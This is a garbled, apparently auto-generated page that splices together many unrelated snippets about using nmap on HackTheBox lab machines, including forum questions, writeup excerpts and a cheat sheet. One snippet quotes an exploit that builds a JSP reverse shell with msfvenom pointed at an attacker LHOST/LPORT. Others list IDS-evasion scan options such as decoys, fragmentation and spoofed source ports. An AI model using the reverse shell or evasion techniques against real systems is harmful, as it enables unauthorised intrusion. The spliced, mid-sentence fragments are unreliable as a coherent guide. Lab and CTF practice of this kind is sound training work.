Hackthebox nmap. All 65535 scanned ports on 10.


198. Jan 7, 2021 · HttpFileServer/2. 29 ms 10. The exploit seems to save a visual basic script (. 0. These are the results that I am getting. You signed out in another tab or window. May 18, 2023 · Hello Please help me… Question Based on the last result, find out which operating system it belongs to. I spun up a Win 10 machine and scanned it and it showed all ports filters. In this module, we will learn the basics of this tool and how it can be used efficiently to map out the internal network by identifying live hosts and performing port scanning, service enumeration Jul 6, 2023 · In this module, we covered Nmap, a versatile network scanning tool. Hacking [email protected] 38 Walton Road Folkestone, Kent CT19 5QS, United Kingdom Company No. I tries with cap and keeper machine, but no port! I use my kali computer terminal, i read about a VPN story but i didn’t understand it 🙂 ┌──(youssef㉿Youssef)-[~] └─$ sudo nmap -p- -Pn -sC -sV -v -T4 (machine ip address) [sudo] Mot de passe de youssef : Starting Nmap 7. Jan 15, 2021 · Just solved this section, overall I loved the nmap course, it takes a lot of investigation and trying, not just copy pasting. 224 Nmap scan report for 10. I tried scanning every port with just the IP and scanning the port that is given to me. So I proceeded to go to the website You have now solved Topology (Easy) CTF — HackTheBox. Not shown : 1000 closed tcp ports (reset). Mar 27, 2022 · nmap -p 22,80,3000 -A -T4 -oN . 92 ( https://nmap. 1 -sV: Attempts to determine the version of the service running on port-sV -version-intensity: nmap 192. Through practical challenges and assessments, we gained valuable experience with Nmap’s capabilities. You signed in with another tab or window. 10. As you can see from your terminal output, the scan has only scanned the top 1000 ports. 209 Apr 22, 2023 · Using NMAP, we can find the version of the Apache HTTP Server running is Apache httpd 2. Basically these scripts are written in Lua programming language. Port 22 - SSH: Pretty standard port to see open on linux boxes, we can try to leverage this later on if we find credentials or private key. Or any other machines. It is See full list on medium. 21 seconds Oct 28, 2017 · Does port scanning take an unreasonable long time for anyone else? I’m trying a basic all ports scan against sneaky, but it’s taking forever: root@wallis:~# nmap -p- 10. Mar 5, 2024 · Nmap done: 1 IP address (1 host up) scanned in 7. 4 Host is up (0. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. To eliminate #2, on Linux, run the command ip route show and check to see if you have a route into the network, if you have a route into the network it in this case it would look something like 10. It is an important part of network diagnostics and evaluation of network-connected systems. 42 seconds Rebound is an incredible insane HackTheBox machine created by Geiseric. Apr 27, 2020 · Hi Team, I am facing below issue , When I am executing the same nmap command twice I am getting different results and also some ports are invisible even though if I use -p- switch root@kali:~/Desktop# nmap -Pn 10. 1 9 Aug 13, 2021 · The exploit is essentially doing three things: It generates a JSP (JavaServer Pages) reverse shell file with msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}. Eventually, we discovered that this was caused by the debug mode being enabled on every network device, which combined with normal Nmap scans, caused slowdowns. 30s latency). com Apr 23, 2021 · hackthebox laboratory ctf gitlab nmap masscan vhost ffuf cve-2020-10977 hackerone lfi Arbitrary-file-read deserialization ruby rails console ssh irb path-hijack suid root This post is licensed under CC BY 4. org ) at 2020-04-27 14:31 EDT Nmap scan report for 10. Network Enumeration with Nmap. Submit the OS Jan 6, 2021 · Hi all, I am facing some strange behavior with my openVpn connection, which I identified when nmap behaved inconsistent. I tried today with a hackthebox machine but the same problem persists. nse -vv Output: Sep 8, 2018 · As with every HTB, I started with a Nmap scan along with the options that the popular YouTube channel IppSec commonly uses. The tool is widely used by both offensive and defensive security practitioners. What service is running on port 8080? (two words)” The nmap scans shows this: 8080/tcp filtered http-proxy I already tried with http proxy, http-proxy and things like that, but it doesn’t work. This is the first walkthrough I have put together! I have completed several boxes on HackTheBox In short, nmap (or a script that uses nmap) is often the first step in enumerating targets. Feb 27, 2021 · Once the scan is completed, nmap will write the results to our Extracts folder (-oA) >> nmap -p22,80,33060 -sC -sV -oA Extracts/Academy 10. Hello, I know this is an old thread, but I was having this closed port happen quite often and finally reached out to support. Jun 25, 2021 · Hey Guys, I have just joined vip and I am trying to use nmap on legacy. — are in ignore states. 186 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7. Ports that are deliberately excluded from Apr 2, 2023 · Do large nmap scans just to find out what is out there They mentioned the use of IDS/IPS so using some evasion techniques may yield more findings; investigate the found ports using previously taught approaches more targeted nmap commands or banner grabbing, again hide from ids/ips Apr 30, 2023 · はじめに本記事は「HackTheBox:Three」のwriteupです。 └─$ nmap -sV -p- --min-rate 5000 10. While alot of the ‘common’ ports are under 1000 such as HTTP 80 & HTTPS 443 there are 65535 ports in total. 50. 3 and Virtual Box 6. I observed port 80 was open so I went to check out the the webpage and make some observations. So, we can get the answer by using another tool. I have viewed other posts on the forum for a small hint and Note: Medium Lab can be solved using command: nmap -sSU -p53 <ip address> --script=dns-nsid. I have run all the basic scripts it shows with -sV -A -sC and I am lost. Mar 20, 2022 · Hello everyone I have some trouble advancing in the HTB-academy. I use a different set of commands to perform an intensive scan. This SYN scan is set only to default when we run it as root because of the socket Aug 1, 2023 · First, we can always start with getting a lay of the land using Nmap or any preferred port scanner sudo nmap -sS -v -n -A 10. 39 You signed in with another tab or window. It is showing ports that I know should be open as Filtered on the machines, and can’t start on a new machine as a result :(. In general. I’ve done various nmap scans from simple nmap 10. It is the default port used to WITH NMAP Scan all ports between 22 and 110: -p22-11Ø Scans only the specified ports 22 and 25: -p22 , 25 Scans top 100 ports: -F Performs an TCP SYN-Scan: Performs an TCP ACK-Scan: Performs an UDP Scan: -sU CHEAT SHEET Scans the discovered services for their versions: -sv Perform a Script Scan with scripts that are categorized as "default": -sc Nov 2, 2020 · Hi, i’m trying to complete the Starting Point machine but i got stuck… after connect with: sudo openvpn x-startingpoint. I was able to nmap 2 days ago but not any more. Let’s start with an nmap scan. I have no idea why. What I’ve done: We’ll I’ve enumerated both Oct 14, 2023 · Hello guys, I am new here, I want to ask you if you have any idea why i can’t find an open port. If it is really up, but blocking our ping probes, try ->Pn Nmap done: 1 IP address (0 hosts up) scanned in 4. I’ve also tried using nslookup, arp, and dig. x. 120. 9p1) service, and port 80 running HTTP (Hypertext Transfer Protocol). 213 WARNING: No targets were specified, so 0 hosts scanned. 100 Starting Nmap 7. x are in ignored states. 18 What should I do when the host 10. I also tried nmap with a previous machine that i’ve completed (which i remember did not take long) and still Aug 16, 2020 · I do open a differtent terminal where I try to use the nmap. Submit the name of the operating system as result. org ) at 2021-01-06 22:10 CET Note: Host seems down. 18”? Good luck! Nov 16, 2020 · Could be: the host is really down; you aren’t connected to the right network/vpn; the host or network is filtering ICMP; To determine if it’s #1, eliminate #2 and #3. 2: According to the active machine list, machine ’ Buff’ is still open with IP 10. On “last result” about qeustion, host is 10. The lab is trying to teach us that. 208. 4. Dec 30, 2020 · Hi there. With this prior knowledge, we can use the command Apr 24, 2021 · The traceback box is an easy rated machine on hackthebox. 10 . It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. 215. org ) at Through network traffic analysis, this module sharpens skills in detecting link layer attacks such as ARP anomalies and rogue access points, identifying network abnormalities like IP spoofing and TCP handshake irregularities, and uncovering application layer threats from web-based vulnerabilities to peculiar DNS activities. 80 -O first trying to get the name of OS, then I got serveral OS guesses. 10826193 May 2, 2020 · Nmap done: 1 IP address (0 hosts up) scanned in 0. You will find they use -sSU, and I used -T5 for this scan. Nmap is one of the most used networking mapping and discovery tools because of its accurate results and efficiency. I am using Kali 2017. 3 Host is up (0. Question 1. I have run every scan I could think of and have nothing. I’ve searched on web and tried -sV, -Pn, and other additional commands but nothing have worked do you know why this problem has happed? and hop to solve it? Apr 9, 2021 · I saw using nmap documentation the script for “dns-nsid”. Mar 9, 2021 · Thanks for that, i’m kinda new to linux and was hoping to find just that. 181. Just follow the same format of the example on nmap documentation. I am working on the education module for NMAP, specifically I am on the service enumeration section and I cannot find the flag related to the service. I have also spoofed the source address as well as source port and disabled arp ping to try and find the DNS server version. The hard lab is bypassing Firewall and then IDS/IPS. 14. Then I read the hint saying ‘we found out that they want to prevent neighboring hosts of their /24 subnet mask from communicating with each other’, so I tried to spoof the IP address using -S with some random IP address with a diffreent subnet mask sudo nmap 10. The Question is: “Our client wants to know if we can identify which operating system their provided machine is running on. The most I have been able to get is from this command #nmap -sA -T3 -p 50000 --disable-arp-ping -sV --source-port 53 <IP> -Pn --script broadcast-db2-discover. 119. Mar 26, 2018 · The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. 18 seconds Welcome to a new writeup of the HackTheBox machine Runner. This module covers fundamentals that will be needed to use the Nmap tool for performing effective network enumeration. I followed it’s instructions, connect to htb network, ran the nmap port scan as written in the guide ( nmap &hellip; This is an entry level hack the box academy box of the series road to CPTS. This happens to each machine even the Starting Point machine. 50 ( https://nmap. Ctf Writeup. I PM’d a member who said there are open ports. 84 -sC specifies default scripts Login to HTB Academy and continue levelling up your cybsersecurity skills. 110. Take a look through these nmap docs - one port in particular should stand out. I was just checking out their beginners guide which you get at your first login. after about 45mins they were able to figure out that if they shot the following nmap command with specific options that they got the open ports we were looking for for that machine Apr 9, 2021 · I am needing some help with my nmap academy lab for firewall evasion. The options I use are the following: Learn Nmap to find Network Vulnerabilitiestake it to the next level with ITProTV (30% OFF): https://bit. In both cases I get Note: Host seems down. Not shown: 1000 closed tcp ports (reset) " " Is this normal? Things that are working: Can ping the boxes Can ping the vpn gateway Traceroute working Things I have tried: confirmed I am connected to the Starting point VPN Dec 16, 2021 · Nmap scan and the results. 3 this is a new writeup of the HackTheBox machine IClean. The tool is widely Sep 11, 2022 · Another Hint. What networking constructs are used to direct traffic to the right application on a server? This “construct” is really just a number that is an essential part of TCP and is one of the most important aspects of networking. Dice: Ahora nuestro cliente quiere saber si es posible averiguar la versión de los servicios en ejecución. Filtered ports. I have tried looking at the scripts in the folder and nothing seems to match what comes up in the vuln script scan. /nmap/secret 10. From there its fairly In fact it is easy, you just have to specify in nmap which port you want to scan with the options -sV and -Pn and ready, in the result is the flag, only that obviously is not at a glance, you have to read carefully the answer and there is a section of the code that begins with HTB, that is the flag. 28s latency). 3 (port 80) gobuster ___ Method #1: using Metasploit (failed) Inspecting payload with Burp. → nmap -sV -sC -sT 10. I have changed from udp to tcp. Though I keep on getting a filtered port. 80 -O -S 10. Htb Writeup. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. It’s a pure Active Directory box that feels more like a Less than 20 minutes into testing, this network admin had sent emails to the entire distribution list and came over to my desk telling me that our scans had slowed the network to a halt. ly/itprotvnetchuck or use code "networkchuck" (aff My go to approach is : TCP ports reconnaissance 1. Please help me to solve this …thanks in advance May 20, 2020 · Nmap is a free and open source utility for network discovery and security auditing. This is a pretty common question recently, so if you search around you will find lots of advice and tips. Sometimes when I spawn a machine I get IP’s with a port like 32686. " " All 1000 scanned ports on 10. 129. Mar 24, 2022 · $ sudo nmap 10. NMAP alone will not give you the flag for the Hard lab. 1 -sV -version-intensity 8 We would like to show you a description here but the site won’t allow us. 1 2 … 7 8 3040. 213 -n -Pn -O -S 10. 16. When interacting with an actual IDS I would avoid the -A switch, and instead recommend some combination of the following: -T 0 (paranoid timing), -f (fragmented packets), -D (specify a decoy source IP address), --data-length 200, and -g (use source port of a common network protocol like DNS Jun 25, 2023 · From the NMAP scan, ports 80 and 22 were discoverable. May 10, 2024 · SWITCH EXAMPLE DESCRIPTION-sV: nmap 192. 135 Starting Nmap 7. org ) at 2017-10-28 23:53 BST Stats: 0:12:52 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 6. This is an entry into penetration testing and will help you with CPTS getting sta Sep 11, 2022 · Conclusion — Run nmap scan on [target_ip] and we have noticed port 23/tcp in an open state, running the telnet service. The Apache server, by default, runs on port 80. Yesterday i tried a machine (not on hackthebox) and i noticed the problem. 6p1 Ubuntu 4ubuntu0. Any help would be appreciated. So my command is; “sudo nmap -sV -O -T5 -p- 10. Now use mentioned command to connect to the target server “telnet [target Aug 3, 2019 · You can also use Zenmap, which is the official Nmap Security Scanner GUI. Jun 22, 2022 · Discovering Open TCP Ports. 27 Starting Nmap 7. The content is extremely engaging through the gamified approach and the pace at which new and high quality content is updated ensures our team's skills are always sharp. Aug 22, 2023 · Hola, estoy en el último ejercicio de nmap de academy y no hay manera de sacarlo, hay alguien que pueda echarme una mano? Saludos. I have target port 80 mostly because of the hint. I'm at the starting point of HackTheBox, which tells me to run a scan by Nmap. 46 ms 10. 49 seconds" Some more points, My connection is on. This number is We would like to show you a description here but the site won’t allow us. Hack The Box has been an invaluable resource in developing and training our team. 今回はnmapとGobusterを用いました。 nmapを用いてポートスキャンを行ったところ、以下のポートが使用されていることが確認できたため、まずは与えられたIPアドレスでブラウザからアクセスします。 Jul 19, 2023 · Nmap results showing two open ports We got two open ports: port 22 running a OpenSSH (version 8. 224 Host is up (0. 0 by the author. Show more. 11. 20 Starting Nmap 7. When I arrived to the page for the first time it mentioned ssl and I Sep 17, 2022 · To solve available tasks run nmap scan on the [Target_IP] as shown below - nmap -p- -sV target_ip -p- option can be used to check all ports and if takes so much time, then use provided command Feb 17, 2021 · I can ping but not able to nmap. After Firewall is bypassed then it is likely that IDS/IPS is weak too. Not shown: 65532 filtered ports PORT STATE Feb 15, 2023 · It signifies that although Nmap was able to finish a TCP handshake with the target system, the target system actively refused the connection when Nmap states that a port is in the “closed” or “conn-refused” state. Htb. 41. Nmap suggests to use -Pn, i cant nmap any machine. Ctf. From this link: " By default, Nmap scans the top 1000 TCP ports with the SYN scan (-sS). I used instance provided by hackthebox academy. 3 -p- Starting Nmap 7. 54. 0/24 ? My initial nmap scan does not reveal anything about hosts that are up. nmap -nv -Pn -sV -sC -O -T4 -oA nmap 10. It’s 100% a problem on my side as I can’t do any nmap probing or pings on another website that I use. Oct 18, 2022 · Hey Guys, I’m a complete newbie, so sorry in advanced if the answers seems to obvious, but I could need a hint into the right direction. jsp Jul 14, 2020 · Hello, I am new to hackthebox. I successfully connected to the HTB VPN through openvpn, but I can’t do any nmap commands on Laboratory, currently active machine. 168. I have tried different flags while running NMAP. By default, our network uses UDP port 1337. ovpn i got this message: Mon Nov 2 16:25:42 2020 WARNING: this configuration may cache passwords in memory – use the auth-nocache option to prevent this Mon Nov 2 16:25:42 2020 Initialization Sequence Completed After this i open a new terminal and write: ports=$(nmap -p Nmap is one of the most used networking mapping and discovery tools because of its accurate results and efficiency. 0/24 via 10. 18 is down while conducting “sudo nmap -O 10. . Even though I am connected to the vpn and it has got tun0 Can anyone help me with this. org, reddit, duckduckgo, google, bing and nothing still a blank version section. Launching a quick TCP scan ## 100 most common TCP ports nmap -Pn -n -vv --open -F -T4 <ip> -oA nmap-fast-tcp ## Options: # -Pn Disable is-alive probes # -n Disable reverse DNS lookup # -vv extra verbosity # --open Output only open ports # -F 100 most common TCP ports # -T4 Aggressive scan (default is T3 and it can go up to T5 which is very Oct 6, 2022 · I know they said that sudo nmap changes the way that nmap works, and I guess that is the same things with netcat. In the instructions provided by HackThe Box itself, it doesn't seem to be so complicated since it's the starting point tutorial. Mar 21, 2021 · Hello, I’m currently trying to do machines again and went back to my account. 2. When I did a nmap scan it showed all ports filtered. 3 May 2, 2023 · The output of nmap looks like (showing only the relevant bits): Not shown: 998 closed tcp ports (conn-refused) HackTheBox (HTB) provides a platform for cybersecurity enthusiasts to enhance We would like to show you a description here but the site won’t allow us. vbs) on the target. All 65535 scanned ports on 10. Nmap scan report for 10. PD, hay un IDS, un IPS y un cortafuegos. Dec 12, 2020 · Hi Everyone! Just starting the Dante lab and looking info to do the first nmap scan. Sep 13, 2020 · I am new to HTB and I am trying to use nmap on the active machine but it’s not working . I’m running Kali on a VMmachine. 10 Jan 8, 2024 · Hello, I have a problem with Nmap and tryhackme site. By default, nmap scans the top 1000 ports with the SYN (-sS) scan. It says “Perform an Nmap scan of the target. Jun 7, 2022 · Hi! Nmap is an fundamental skill required for basicly all penetrating testing projects and CTFs. Not able to ping the target I can nmap my wifi router but not hackthebox systems. Sep 17, 2022 · To solve available tasks run nmap scan on the [Target_IP] as shown below - nmap -p- -sV target_ip -p- option can be used to check all ports and if takes so much time, then use provided command Feb 15, 2023 · It signifies that although Nmap was able to finish a TCP handshake with the target system, the target system actively refused the connection when Nmap states that a port is in the “closed” or “conn-refused” state. Just the target IP. I then turned off the firewall on the Win 10 machine and the nmap scan showed open ports. Sep 25, 2020 · When running an Nmap scan all ports are showing as Filtered. 80 ( https://nmap. org ) at 2020-04-27 01:56 BST Error #487: Your port specifications are illegal. 13% done; ETC: 02:23 (3:17:07 Feb 9, 2021 · Just like the title says, nmap is taking forever since yesterday. org ) at 2022-03-24 08:12 GMT setup_target: failed to determine route to 10. You switched accounts on another tab or window. 1 4 days ago · Hi Z3R0V01D,. ” However, no nmap scan I’ve run returns a hostname. When I scan: nmap (different stuff like -sV -Pn) +ip The scan complete with 1000 ports scanned but in ignored state(conn-refused). I don’t have much to share, but I guess a hint is you need to compare your result with the one shown on the course page, and identify whether you are getting the same result, then proceed to go to the next step. Anyway, I hope this helps. nmap -A -v 10. Can you confirm that the ip range is 10. Mar 19, 2021 · nmap -Pn -sC -sV -vvvvvvvvvv --reason -T4 -p- 178. When i add -Pn to the Aug 20, 2019 · Lastly, if Nmap is still failing, open up your ovpn config file in the editor and change the settings to convert the connection to TCP instead of UDP. Its even possible the lab is configured to require you to do something differently than a simple scan. Sep 15, 2020 · $ nmap -sC -sV -T4 -p- -oN nmap/quick_all 10. 200 -e tun0 Starting Nmap 7. 62. Dec 11, 2021 · I just got stuck in the first exercise. 27 (Starting Point machine) I get the message that the Host seems down but if it is up to use -Pn. Oct 25, 2022 · A sudo nmap (ip) outputs this sudo nmap -p- says it will take about 4 hours to complete so I never completed it. Reload to refresh your session. Edit: I couldn’t walk away. 4 are filtered Too many fingerprints match this host to give specific OS details TRACEROUTE (using proto 1/icmp) HOP RTT ADDRESS 1 249. 91 ( https://nmap. 1. When i run nmap 10. Currently I am working on the NETWORK ENUMERATION WITH NMAP module, and I’m stuck literally on the first module. —. Sometimes it works, sometime I do get this └─$ nmap -sC -sV 178. In most cases, when a port is shown to be ‘filtered’ it means that there is some Mar 29, 2021 · I am completely lost on this section. Let’s cover all the theory together! I mean everything hours of Research on nmap. You will need to use nmap and another tool to get the answer. Ive an openvpn connection, i do see tun0 conn estb. Nov 3, 2023 · Nmap done: 1 IP address (1 host up) scanned in 84. 93 ( https://nmap. I have done a full network scan to look at the other hosts that are on the network. 12s latency). 1 more question though: why the “s” in “sed s/,$//” ? i know the comma and the slash are escaped with the “/”, $ is end of line, but still can’t figure out what the “s” is for. Ping is not a good way to test a network Feb 11, 2021 · I’d really appreciate a nudge with the following question: Section: Nmap Scripting Engine Question: “Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer” Hint: Web servers are among the most attacked services because they are made accessible to users and present a high attack potential. Nmap is used to identify and scan systems on the network. Since the machine seems to run on that port I don’t really know how to do a nmap scan. Aug 2, 2022 · I did sudo nmap 10. 198 All I get is “the host is down try it with -Pn” , it is running but still no such result. We learned its usage, analyzed scan results, utilized the Nmap Scripting Engine (NSE), and practiced evasion techniques. Nmap done: 0 IP addresses (0 hosts up) scanned in 0. I am sure it is not about the scan, I wasted like 2 hours performing a full scan, all the other ports open are related to other exercises. eu. nmap -sC -sV -oA nmap/initial 10. I have also tried slowing down the scan to T1 and put in a -Pn -n -sA with Jan 17, 2021 · Solution: The -A switch is very useful… I’m working on this HTB Academy module, and the second question is “Enumerate the hostname of your target and submit it as the answer. Identifique la versión del servicio de la que hablaba nuestro cliente y envíe el indicador como respuesta. Generally Nmap's script engine does lots of things, some of them are below: Network discovery Feb 15, 2023 · Hi guys, I have a problem with Nmap. This could indicate that no service is listening on that port or that the target system’s firewall is preventing the connection. 94 ( https Jan 27, 2021 · Since there are many ways to use nmap and masscan for host discovery and enumeration, wish do you would recommend? There are mine: nmap -sC -sV -oA host ip nmap -v --open -sC -T4 -oA host ip nmap -T4 -sC -sV -oO --open -v host ip Dec 29, 2019 · I’m trying my first machine postman. It is a medium Linux machine which discuss — to get the root access. 33 to get more information from nmap. Mar 4, 2023 · I have the same issue, the vpn is correctly setted i can ping the machines but when I try to nmap the ports are in ignored state, I tried to change the network interface of the vm and I tried to disable my gateway firewall but nmap still doesn’t work. If it is really up, but blocking our ping Apr 27, 2020 · └──╼ $nmap -sC -sV -p$ports 10. I was scanning ignite on tryhackme site when I scan, All 1000 scanned ports on —. in vq cp hl ih ha gf rt ul wu